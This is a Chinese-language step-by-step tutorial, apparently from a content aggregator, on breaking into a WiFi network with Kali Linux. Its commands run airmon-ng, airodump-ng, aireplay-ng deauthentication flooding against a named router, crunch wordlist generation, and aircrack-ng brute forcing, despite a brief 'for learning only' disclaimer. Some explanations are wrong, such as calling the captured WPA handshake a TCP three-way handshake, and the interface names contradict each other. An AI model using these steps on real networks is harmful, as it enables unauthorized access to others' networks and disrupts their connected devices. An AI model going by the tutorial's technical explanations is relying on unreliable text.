使用kali linux系統(tǒng)進(jìn)行wifi暴力破解獲取密碼

注意：私自破解他人WiFi屬于違法行為，本教程僅供學(xué)習(xí)與參考。

破解工具

破解工具：kali linux系統(tǒng) ，本教程使用的裝在物理機(jī)的linux系統(tǒng)（虛擬機(jī)使用方法一樣）。

支持監(jiān)聽模式的無線網(wǎng)卡，本教材使用的是某寶購買的3070L網(wǎng)卡。

字典文件（如果你沒有字典也沒有問題后面會(huì)教你如何使用cruncl創(chuàng)建密碼文件）。

暴力破解就是窮舉法，將密碼字典中每一個(gè)密碼依次去與握手包中的密碼進(jìn)行匹配，直到匹配成功。能否成功破解wifi密碼取決于密碼字典本身是否包含了這個(gè)密碼。破解的時(shí)間取決于CPU的運(yùn)算速度以及wifi密碼本身的復(fù)雜程度。如果WiFi密碼設(shè)得足夠復(fù)雜，即使有一個(gè)好的密碼字典，破解成功也可能要數(shù)小時(shí)甚至數(shù)天。

破解開始

使用ifconfig命令查看本機(jī)網(wǎng)卡名稱。

eth0是有線網(wǎng)卡,wlan0（物理機(jī)）和wlan1（外接）是無線網(wǎng)卡。

使用airmon-ng命令檢查網(wǎng)卡是否支持監(jiān)聽模式。
網(wǎng)卡均可以進(jìn)行監(jiān)聽模式。

使用airmon-ng start wlan1命令開啟網(wǎng)卡監(jiān)聽。
網(wǎng)卡更具自己選擇我這里選擇外界網(wǎng)卡wlan1
使用ifconfig命令查看監(jiān)聽模式是否開啟

無線接口wlan0變成了wlan0mon則說明監(jiān)聽模式開啟。

使用airodump-ng wlan1mon命令掃描附近wifi。
掃描后得到wifi的一些信息BSSID為MAC地址，PWR為信號(hào)強(qiáng)度（越小信號(hào)越強(qiáng)）CH為信道。按下ctrl+c進(jìn)行暫停掃描。

使用命令 airodump-ng -c 5 -w /root/cap/er8 --bssid C8:3A:35:8B:EA:40 wlan1mon進(jìn)行對WiFi熱點(diǎn): Tenda_8BEA40 進(jìn)行抓包。

在新建一個(gè)終端：輸入命令 aireplay-ng -0 5 -a C8:3A:35:8B:EA:40 wlan1mon

0為用deauth洪水攻擊WiFi設(shè)備的次數(shù)，0為無限，-0
5則攻擊5次。攻擊原理是：先讓設(shè)備掉線，設(shè)備會(huì)再自動(dòng)連接，并發(fā)這個(gè)自動(dòng)連接過程會(huì)進(jìn)行三次握手，會(huì)發(fā)送tcp包（里面包含加密的密碼數(shù)據(jù)）

此時(shí)返回前一個(gè)終端，可看到抓到的tcp包

此時(shí)已經(jīng)抓取到了包，可以打開文件夾進(jìn)行查看。
7. 使用命令crunch打開字典生成軟件

在輸入crunch 10 10 012 xy>>/root/12345.txt （10 10表示制作一個(gè)10位數(shù)的密碼， 012表示密碼中包含數(shù)字012xy這些元素，/root/12345.txt表示密碼文本儲(chǔ)存的路徑以及名字）。

8.使用aircrack-ng -w /root/12345.txt /root/cap/er8-01.cap（ircrack-ng -w 字典路徑 握手包路徑） 進(jìn)行wifi密碼破解

系統(tǒng)正在進(jìn)行暴力破解密碼。

密碼破解成功

wifi密碼為：xxyy0011

總結(jié)

以上是生活随笔為你收集整理的教你如何暴力破解wifii密码的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。